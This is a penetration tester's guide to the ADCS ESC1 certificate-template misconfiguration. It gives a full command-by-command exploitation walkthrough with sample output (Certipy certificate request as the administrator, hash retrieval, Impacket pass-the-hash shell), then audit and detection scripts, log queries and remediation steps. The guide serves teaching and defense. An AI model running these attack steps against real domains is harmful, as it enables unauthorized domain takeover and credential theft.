ADCS-ESC1: Misconfigured Certificate Templates Leading to Full Domain Compromise

Executive Summary

Active Directory Certificate Services (ADCS) ESC1 is a critical misconfiguration that allows attackers with low-privileged domain credentials to escalate to Domain Administrator. This vulnerability exists when certificate templates are improperly configured, allowing users to request certificates on behalf of any domain account, including administrators.

In this guide, we'll cover what ESC1 is, how attackers exploit it, the tools used, and how to defend your environment.

What is ADCS-ESC1?

Understanding Active Directory Certificate Services

Active Directory Certificate Services (ADCS) is Microsoft's Public Key Infrastructure (PKI) solution that manages digital certificates in Windows environments. ADCS enables:

  • User and computer authentication
  • Smart card logon
  • Code signing
  • Secure email (S/MIME)
  • Network access control (802.1x)

The ESC1 Vulnerability

ESC1 occurs when a certificate template has all of the following misconfigurations:

  1. Enrollee Supplies Subject is enabled - Users can specify the Subject Alternative Name (SAN)
  2. Client Authentication EKU is present - Certificate can be used for authentication
  3. No Manager Approval required - Certificates are issued automatically
  4. Domain Users can enroll - Low-privileged users have enrollment rights
  5. Template is enabled - The template is published and active

When these conditions exist together, an attacker can:

  • Request a certificate for ANY user (including Domain Admin)
  • Use that certificate to authenticate as that user
  • Maintain access for the certificate's validity period (typically 1-10 years)

Why This Matters

Severity: Critical - Full domain compromise from low-privileged account

Impact:

  • Immediate Domain Administrator access
  • Long-term persistence (certificates valid for years)
  • Survives password resets
  • Difficult to detect in standard logs
  • Can be renewed before expiration

How Attackers Exploit ESC1

Attack Prerequisites

  • Valid domain credentials (any domain user)
  • Network access to Domain Controller
  • Network access to Certificate Authority

Attack Flow

Low-Priv User -> Enumerate ADCS -> Find ESC1 Template -> Request Admin Certificate -> Authenticate -> Domain Admin

Tools Used in ESC1 Attacks

Offensive Tools

Certipy-AD

  • Python-based ADCS exploitation tool
  • Enumerates certificate templates
  • Identifies vulnerabilities (ESC1-ESC13)
  • Requests and authenticates with certificates
  • Repository: https://github.com/ly4k/Certipy

RPCClient

  • Part of Samba suite
  • Queries Active Directory via RPC
  • Used to enumerate user SIDs

Impacket

  • Python library for network protocols
  • Tools for Pass-the-Hash attacks
  • Remote command execution (wmiexec, psexec, smbexec)
  • Repository: https://github.com/fortra/impacket

NetExec

  • Network reconnaissance tool
  • Domain enumeration
  • Credential validation

Step-by-Step Exploitation

Prerequisites for ESC1 Exploitation:

Before this attack can succeed, the following conditions must be met:

Account Requirements:

  • Domain user account - Any authenticated domain user (even low-privileged)
  • No special permissions required - Standard domain user privileges are sufficient
  • Enrollment rights - User must have enrollment permissions on the vulnerable certificate template (typically granted to "Domain Users" group by default)

Certificate Template Requirements:

  • Client Authentication EKU enabled - Template allows certificates to be used for authentication
  • "Supply in the request" enabled - Also known as "Enrollee Supplies Subject," this allows the user to specify the Subject Alternative Name (SAN)
  • No manager approval required - Certificate issuance is automatic without administrative approval
  • Domain Users can enroll - Template permissions allow standard domain users to request certificates
  • Template is published - Certificate template must be enabled and available on the Certificate Authority

Infrastructure Requirements:

  • Active Directory Certificate Services (ADCS) deployed - Organization must be using ADCS for PKI
  • Certificate-based authentication enabled - Domain must accept certificates for Kerberos authentication
  • Network access to Certificate Authority - Attacker must be able to reach the CA server (typically port 135 for RPC)

Tools Required:

  • Certipy-AD - For certificate enumeration and exploitation
  • Impacket suite - For credential extraction and lateral movement
  • Network connectivity - To domain controller and certificate authority

Why This Works:

ESC1 exists because the "Enrollee Supplies Subject" setting combined with Client Authentication creates a dangerous combination: any domain user can request a certificate claiming to be any other user (including Domain Admins), and that certificate will be trusted for authentication without verification.
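The five template conditions listed under "The ESC1 Vulnerability" and repeated under "Certificate Template Requirements" map directly onto attributes of the pKICertificateTemplate object in AD, which is what Certipy reads. The following audit function is an added example written for this post; it is not Certipy's code. The attribute names (msPKI-Certificate-Name-Flag, msPKI-Enrollment-Flag, msPKI-RA-Signature, pKIExtendedKeyUsage) and the flag bits and EKU OIDs are the real schema values; the template records, the "enroll" key (a pre-resolved set of principals with Enroll rights) and the group name PKI-Smartcard-Users are constructed for the example.

```python
"""Audit certificate-template attributes for the five ESC1 conditions.

Added example, not Certipy's code. Attribute names are the real AD schema
attributes of pKICertificateTemplate objects; the template records below are
constructed samples, not data from a live directory.
"""

# Bit in msPKI-Certificate-Name-Flag: "Supply in the request" (Enrollee Supplies Subject)
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001
# Bit in msPKI-Enrollment-Flag: "CA certificate manager approval" (requests are pended)
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002

# EKUs that make an issued certificate usable for domain (PKINIT) authentication
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",        # Client Authentication
    "1.3.6.1.5.2.3.4",          # PKINIT Client Authentication
    "1.3.6.1.4.1.311.20.2.2",   # Smart Card Logon
    "2.5.29.37.0",              # Any Purpose
}

# Principals whose enrollment right means "any domain user can enroll" (from the post)
LOW_PRIV_ENROLLERS = {"Domain Users", "Authenticated Users"}


def allows_client_auth(ekus):
    """An empty pKIExtendedKeyUsage means 'all purposes', which includes authentication."""
    return len(ekus) == 0 or bool(AUTH_EKUS & set(ekus))


def esc1_conditions(template, published):
    """Evaluate one template against the five ESC1 conditions.

    `template` keys mirror the LDAP attributes; 'enroll' is the set of principals
    holding Enroll rights, resolved from the template's DACL beforehand (assumption).
    `published` is the set of names listed in a CA's certificateTemplates attribute.
    Returns {condition: bool}; ESC1 holds when every value is True.
    """
    name_flag = template.get("msPKI-Certificate-Name-Flag", 0)
    enroll_flag = template.get("msPKI-Enrollment-Flag", 0)
    return {
        "enrollee_supplies_subject": bool(name_flag & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT),
        "client_auth_eku": allows_client_auth(template.get("pKIExtendedKeyUsage", [])),
        # No manager approval and no authorized signatures required
        "no_manager_approval": not (enroll_flag & CT_FLAG_PEND_ALL_REQUESTS)
                               and template.get("msPKI-RA-Signature", 0) == 0,
        "low_priv_can_enroll": bool(LOW_PRIV_ENROLLERS & set(template.get("enroll", ()))),
        "published": template["name"] in published,
    }


def is_esc1(template, published):
    return all(esc1_conditions(template, published).values())


def esc1_templates(templates, published):
    """Names of all templates in `templates` that satisfy every ESC1 condition."""
    return [t["name"] for t in templates if is_esc1(t, published)]


# Constructed sample data: the post's VulnerableUserTemplate as found, and the same
# template after the mitigation steps (subject built from AD, approval required,
# enrollment restricted to a dedicated group).
PUBLISHED = {"VulnerableUserTemplate", "User", "Computer"}

VULNERABLE = {
    "name": "VulnerableUserTemplate",
    "msPKI-Certificate-Name-Flag": 0x00000001,
    "msPKI-Enrollment-Flag": 0x00000000,
    "msPKI-RA-Signature": 0,
    "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2", "1.3.6.1.4.1.311.20.2.2"],
    "enroll": {"Domain Users", "Authenticated Users"},
}

REMEDIATED = {
    "name": "VulnerableUserTemplate",
    "msPKI-Certificate-Name-Flag": 0x02000000,   # SUBJECT_ALT_REQUIRE_UPN: SAN built from AD
    "msPKI-Enrollment-Flag": CT_FLAG_PEND_ALL_REQUESTS,
    "msPKI-RA-Signature": 0,
    "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2", "1.3.6.1.4.1.311.20.2.2"],
    "enroll": {"PKI-Smartcard-Users"},          # constructed group name
}

if __name__ == "__main__":
    for tpl in (VULNERABLE, REMEDIATED):
        print(tpl["name"], esc1_conditions(tpl, PUBLISHED))
    print("ESC1:", esc1_templates([VULNERABLE, REMEDIATED], PUBLISHED))
```

Feeding this the attributes of every template returned by an LDAP query against the Configuration naming context reproduces the "[!] Vulnerabilities: ESC1" verdict that certipy-ad find prints, and the per-condition dictionary shows which single change (subject source, approval, or enrollment rights) would break the chain.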

Environment Details

Throughout this demonstration, the following environment details are used:

  • Domain: EXAMPLE.COM
  • Domain Controller: 192.168.1.10
  • Certificate Authority: EXAMPLE-DC-CA
  • CA Server: DC01.EXAMPLE.COM
  • Compromised User: testuser
  • Password: SecurePass123
  • Target Account: administrator@EXAMPLE.COM

Step 1: Enumerate ADCS and Find Vulnerable Templates

Command:

certipy-ad find -u "testuser@EXAMPLE.COM" -p "SecurePass123" -dc-ip 192.168.1.10 -vulnerable -enabled

Sample Output:

  Certipy v4.8.2 - by Oliver Lyak (ly4k)

  [*] Finding certificate templates
  [*] Found 45 certificate templates
  [*] Finding certificate authorities
  [*] Found 1 certificate authority
  [*] Found 12 enabled certificate templates
  Certificate Authorities
    0
      CA Name                             : EXAMPLE-DC-CA
      DNS Name                            : DC01.EXAMPLE.COM
      Certificate Subject                 : CN=EXAMPLE-DC-CA, DC=EXAMPLE, DC=COM
      Certificate Serial Number           : 1A2B3C4D5E6F7890
      Certificate Validity Start          : 2023-01-15 08:30:00+00:00
      Certificate Validity End            : 2028-01-15 08:40:00+00:00
  Certificate Templates
    0
      Template Name                       : VulnerableUserTemplate
      Display Name                        : Vulnerable User Template
      Certificate Authorities             : EXAMPLE-DC-CA
      Enabled                             : True
      Client Authentication               : True
      Enrollment Agent                    : False
      Any Purpose                         : False
      Enrollee Supplies Subject           : True
      Certificate Name Flag               : EnrolleeSuppliesSubject
      Enrollment Flag                     : None
      Private Key Flag                    : ExportableKey
      Extended Key Usage                  : Client Authentication
                                            Smart Card Logon
      Requires Manager Approval           : False
      Requires Key Archival               : False
      Authorized Signatures Required      : 0
      Validity Period                     : 5 years
      Renewal Period                      : 6 weeks
      Minimum RSA Key Length              : 2048
      Permissions
        Enrollment Permissions
          Enrollment Rights               : EXAMPLE.COM\Domain Users
                                            EXAMPLE.COM\Authenticated Users
        Object Control Permissions
          Owner                           : EXAMPLE.COM\Enterprise Admins
          Write Owner Principals          : EXAMPLE.COM\Domain Admins
                                            EXAMPLE.COM\Enterprise Admins
          Write Dacl Principals           : EXAMPLE.COM\Domain Admins
                                            EXAMPLE.COM\Enterprise Admins
          Write Property Principals       : EXAMPLE.COM\Domain Admins
                                            EXAMPLE.COM\Enterprise Admins
      [!] Vulnerabilities
        ESC1                              : 'EXAMPLE.COM\\Domain Users' can enroll, enrollee supplies subject and template allows client authentication

What to Look For:

  • [!] Vulnerabilities section shows ESC1
  • Enrollee Supplies Subject: True
  • Client Authentication: True
  • Requires Manager Approval: False
  • Domain Users have enrollment rights

Step 2: Obtain Administrator SID

Since Microsoft patch KB5014754, the domain controller expects the target account's SID embedded in the certificate, so the certificate request must include it. We need to retrieve that SID first.

Command:

rpcclient -U "EXAMPLE\\testuser%SecurePass123" 192.168.1.10

At the rpcclient $> prompt, query the administrator SID:

  rpcclient $> lookupnames administrator
  administrator S-1-5-21-3623811015-3361044348-30300820-500 (User: 1)

Note the SID: S-1-5-21-3623811015-3361044348-30300820-500

Type exit to close rpcclient.

Step 3: Request Certificate for Administrator

Now we request a certificate claiming to be the administrator.

Command:

certipy-ad req -u 'testuser@EXAMPLE.COM' -p 'SecurePass123' -dc-ip 192.168.1.10 -ca 'EXAMPLE-DC-CA' -target 'DC01.EXAMPLE.COM' -template 'VulnerableUserTemplate' -upn 'administrator@EXAMPLE.COM' -sid 'S-1-5-21-3623811015-3361044348-30300820-500'

Sample Output:

  Certipy v4.8.2 - by Oliver Lyak (ly4k)

  [*] Requesting certificate via RPC
  [*] Successfully requested certificate
  [*] Request ID is 2847
  [*] Got certificate with UPN 'administrator@EXAMPLE.COM'
  [*] Certificate object SID is 'S-1-5-21-3623811015-3361044348-30300820-500'
  [*] Saved certificate and private key to 'administrator.pfx'

Success Indicators:

  • Successfully requested certificate
  • Certificate saved to administrator.pfx
  • Request ID provided (note for cleanup)

Step 4: Authenticate with Certificate

Use the certificate to obtain administrator credentials.

Command:

certipy-ad auth -pfx administrator.pfx -dc-ip 192.168.1.10

Sample Output:

  Certipy v4.8.2 - by Oliver Lyak (ly4k)

  [*] Using principal: administrator@EXAMPLE.COM
  [*] Trying to get TGT...
  [*] Got TGT
  [*] Saved credential cache to 'administrator.ccache'
  [*] Trying to retrieve NT hash for 'administrator'
  [*] Got hash for 'administrator@EXAMPLE.COM': aad3b435b51404eeaad3b435b51404ee:a1b2c3d4e5f6g7h8i9j0k1l2m3n4o5p6

Credentials Obtained:

  • NT Hash: a1b2c3d4e5f6g7h8i9j0k1l2m3n4o5p6
  • Kerberos TGT: administrator.ccache

Step 5: Access Domain Controller

Use Pass-the-Hash to execute commands as Domain Administrator.

Command:

impacket-wmiexec EXAMPLE.COM/administrator@192.168.1.10 -hashes 'aad3b435b51404eeaad3b435b51404ee:a1b2c3d4e5f6g7h8i9j0k1l2m3n4o5p6'

Sample Output:

  Impacket v0.11.0 - Copyright 2023 Fortra

  [*] SMBv3.0 dialect used
  [!] Launching semi-interactive shell - Careful what you execute
  [!] Press help for extra shell commands
  C:\>whoami
  example\administrator

  C:\>hostname
  DC01

  C:\>net user

  User accounts for \\DC01

  -------------------------------------------------------------------------------
  Administrator            Guest                    krbtgt
  testuser                 svcadmin                 sqlservice
  The command completed successfully.

  C:\>

Domain Admin access achieved!

Detection Strategies

Event Log Monitoring

Key Event IDs to Monitor:

Event ID 4886 - Certificate Request

  • Location: Certificate Authority -> Security Log
  • Shows: Who requested a certificate
  • Limitation: Doesn't show the SAN value used

Event ID 4887 - Certificate Issued

  • Location: Certificate Authority -> Security Log
  • Shows: Which template was used and who received it

Event ID 4768 - Kerberos TGT Request

  • Location: Domain Controller -> Security Log
  • Shows: Authentication type
  • ESC1 Indicator: PreAuthType = 16 (PKINIT/Certificate authentication)

Certificate Authority Console

  1. Open certsrv.msc on CA server
  2. Navigate to "Issued Certificates"
  3. Add columns: "Requester Name" and "Subject Alternative Name"
  4. Red Flag: Requester Name ≠ SAN (e.g., testuser requests certificate for administrator)

SIEM Detection Query

Example Splunk Query:

  index=windows EventCode=4887 OR EventCode=4768
  | where (EventCode=4887 AND RequesterName!="administrator") OR (EventCode=4768 AND PreAuthType=16)
  | stats count by RequesterName, TargetUserName, ComputerName
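The strongest ESC1 signal in the sections above is the combination of a CA "Issued Certificates" row whose Requester Name differs from the account named in its Subject Alternative Name, followed by a 4768 event with PreAuthType 16 for that impersonated account. The script below is an added example written for this post, not from the original author, Splunk or any vendor: it applies that requester/SAN comparison and the PKINIT correlation to constructed sample records. The row layout (Requester, SAN, Template, Issued) mimics the certsrv.msc columns named above, the "Other Name:Principal Name=" SAN format is assumed to match what the console shows, and the client IP 192.168.1.55 and timestamps are made up; Request ID 2847 and the account names come from the post.

```python
"""Flag issued certificates whose requester does not match the SAN account and
correlate them with PKINIT (PreAuthType 16) TGT requests for that account.

Added example for this post. The certificate rows mimic the certsrv.msc
'Issued Certificates' view with the 'Requester Name' and 'Subject Alternative
Name' columns; the 4768 events mimic parsed DC Security log entries. All
sample data below is constructed.
"""
from datetime import datetime, timedelta

PKINIT_PREAUTH = "16"                 # PreAuthType 16 = PA-PK-AS-REQ (certificate logon)
CORRELATION_WINDOW = timedelta(hours=24)

# Constructed 'Issued Certificates' rows
ISSUED = [
    {"RequestID": 2846, "Requester": "EXAMPLE\\svcadmin",
     "SAN": "Other Name:Principal Name=svcadmin@EXAMPLE.COM",
     "Template": "User", "Issued": datetime(2024, 5, 1, 9, 0)},
    {"RequestID": 2847, "Requester": "EXAMPLE\\testuser",
     "SAN": "Other Name:Principal Name=administrator@EXAMPLE.COM",
     "Template": "VulnerableUserTemplate", "Issued": datetime(2024, 5, 1, 9, 12)},
]

# Constructed 4768 events from the DC Security log (IP address is made up)
TGT_EVENTS = [
    {"EventCode": 4768, "TargetUserName": "administrator", "PreAuthType": "16",
     "IpAddress": "::ffff:192.168.1.55", "Time": datetime(2024, 5, 1, 9, 15)},
    {"EventCode": 4768, "TargetUserName": "testuser", "PreAuthType": "2",
     "IpAddress": "::ffff:192.168.1.55", "Time": datetime(2024, 5, 1, 8, 50)},
]


def san_upn(san):
    """Extract the UPN from a SAN column value; None when the SAN carries no UPN."""
    marker = "Principal Name="
    if marker not in san:
        return None
    return san.split(marker, 1)[1].split(",")[0].strip()


def requester_sam(requester):
    """'EXAMPLE\\testuser' -> 'testuser'"""
    return requester.rsplit("\\", 1)[-1].lower()


def mismatched_certificates(rows):
    """Rows where the requester and the SAN UPN name different accounts."""
    hits = []
    for row in rows:
        upn = san_upn(row["SAN"])
        if upn is None:
            continue
        if upn.split("@")[0].lower() != requester_sam(row["Requester"]):
            hits.append(row)
    return hits


def correlate_pkinit(mismatches, events, window=CORRELATION_WINDOW):
    """Pair each mismatched certificate with PKINIT TGT requests for the SAN
    account that occur within `window` after the certificate was issued."""
    alerts = []
    for row in mismatches:
        target = san_upn(row["SAN"]).split("@")[0].lower()
        for ev in events:
            if ev["EventCode"] != 4768 or ev["PreAuthType"] != PKINIT_PREAUTH:
                continue
            if ev["TargetUserName"].lower() != target:
                continue
            if row["Issued"] <= ev["Time"] <= row["Issued"] + window:
                alerts.append({"RequestID": row["RequestID"], "Requester": row["Requester"],
                               "Impersonated": target, "LogonFrom": ev["IpAddress"],
                               "LogonTime": ev["Time"]})
    return alerts


if __name__ == "__main__":
    for a in correlate_pkinit(mismatched_certificates(ISSUED), TGT_EVENTS):
        print(f"[ALERT] request {a['RequestID']}: {a['Requester']} obtained a certificate "
              f"for {a['Impersonated']}, then PKINIT logon from {a['LogonFrom']} at {a['LogonTime']}")
```

The mismatch check alone already gives a Request ID to revoke; the correlation step turns a suspicious issuance into evidence that the certificate was used, which is what an incident responder needs before resetting the impersonated account and revoking the certificate.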

Mitigation and Remediation

Fix Vulnerable Templates

Access Certificate Templates:

Run -> certtmpl.msc

For Each Vulnerable Template:

  1. Right-click template -> Properties
  2. Subject Name tab: change from "Supply in the request" to "Build from this Active Directory information"
  3. Issuance Requirements tab: enable "CA certificate manager approval"
  4. Security tab:
     • Remove "Domain Users" from enrollment rights
     • Remove "Authenticated Users" from enrollment rights
     • Add only specific security groups that require access

Revoke Malicious Certificates

  1. Open certsrv.msc on the Certificate Authority
  2. Navigate to "Issued Certificates"
  3. Find certificate by Request ID
  4. Right-click -> "All Tasks" -> "Revoke Certificate"
  5. Select Reason: "Privilege Withdrawal"

Best Practices

Template Configuration:

  • Never allow "Supply in the request" unless absolutely necessary
  • Always require manager approval for sensitive templates
  • Restrict enrollment to specific groups, not Domain Users
  • Remove Client Authentication EKU if not required
  • Reduce certificate validity periods (use shorter timeframes)

Monitoring:

  • Enable audit logging on Certificate Authority (Event IDs 4886, 4887)
  • Monitor for certificate requests with mismatched requester/SAN
  • Alert on PKINIT authentication (Event ID 4768, PreAuthType=16)
  • Regularly audit certificate templates for misconfigurations

Regular Audits: Run vulnerability scans using Certipy or similar tools:

certipy-ad find -u 'auditor@domain.com' -p 'password' -dc-ip <DC-IP> -vulnerable -enabled

Real-World Impact

Threat Actor Usage

APT29 (2022): Used ESC1 to impersonate administrators and maintain persistent access in compromised networks.

UNC5330 (2024): Exploited Ivanti vulnerabilities followed by ESC1 abuse for domain escalation.

Business Impact

  • Average Breach Cost: $4.35M (2024)
  • Recovery Time: 6-12 months for full domain rebuild
  • Certificate Validity: 1-10 years of potential unauthorized access
  • Persistence: Survives password resets and standard remediation

MITRE ATT&CK Framework Mapping for ESC1

Primary Technique

T1649 - Steal or Forge Authentication Certificates

  • Tactic: Credential Access
  • URL: https://attack.mitre.org/techniques/T1649/
  • Description: Adversaries may steal or forge certificates used for authentication to access remote systems or resources. Certificate-related misconfigurations enable opportunities for privilege escalation by allowing users to impersonate privileged accounts via identities (SANs) associated with a certificate.

Tactics Covered

TA0006 - Credential Access

  • ESC1 enables obtaining administrator authentication certificates

TA0004 - Privilege Escalation

  • Escalating from low-privileged user to Domain Administrator via certificate impersonation

TA0003 - Persistence

  • Long-term access via certificate validity (typically 1-10 years), surviving password resets

Related Sub-Techniques

T1078.002 - Valid Accounts: Domain Accounts

Detection Data Sources (per MITRE)

  • Active Directory: Active Directory Credential Request
  • Active Directory: Active Directory Object Modification
  • Application Log: Application Log Content
  • Logon Session: Logon Session Creation
  • Windows Registry: Windows Registry Key Access

Key MITRE References

  • SpecterOps Certified Pre-Owned Whitepaper - Referenced in T1649 as foundational research
  • Contributors: Lee Christensen (SpecterOps), Thirumalai Natarajan (Mandiant)
  • Technique Created: August 3, 2022
  • Last Modified: October 14, 2024

Conclusion

ADCS-ESC1 represents a critical vulnerability that transforms low-privileged access into long-term domain compromise. The combination of easy exploitation, difficult detection, and extended persistence makes this a high-priority security concern for any organization running Active Directory Certificate Services.

Key Takeaways:

  1. ESC1 is exploitable with basic domain credentials and publicly available tools
  2. Detection is challenging without proper logging and monitoring
  3. Impact is severe - full domain compromise with multi-year persistence
  4. Remediation is straightforward - fix template configurations and implement proper access controls
  5. Prevention is critical - regular audits and security best practices

Organizations must prioritize ADCS security by:

  • Auditing certificate templates regularly
  • Implementing least-privilege access controls
  • Enabling comprehensive monitoring
  • Training administrators on ADCS security
  • Testing defenses through purple team exercises

The tools and knowledge to exploit ADCS are freely available. The question is not whether attackers will target your certificate infrastructure, but when. Proactive security measures are essential to protect against this "privilege escalation as a service" vulnerability.

References

  1. SpecterOps - Certified Pre-Owned: https://specterops.io/wp-content/uploads/sites/3/2022/06/Certified_Pre-Owned.pdf
  2. Black Hills Information Security - ADCS Abuse Guide: https://www.blackhillsinfosec.com/abusing-active-directory-certificate-services-part-one/
  3. Microsoft ADCS Documentation: https://learn.microsoft.com/en-us/windows-server/identity/ad-cs/
  4. Certipy GitHub Repository: https://github.com/ly4k/Certipy
  5. Impacket GitHub Repository: https://github.com/fortra/impacket

About GhostShift

Penetration tester with 7+ years of experience in offensive security, having completed over 100 penetration tests across cloud, web, mobile, and internal/external network environments. I hold OSCP, EWPTXv2, and Cloud Essentials certifications and have conducted security assessments for global clients in public and private sectors. I specialize in real-world attack simulations, manual exploitation, and helping organizations understand and mitigate security risks from an attacker's perspective.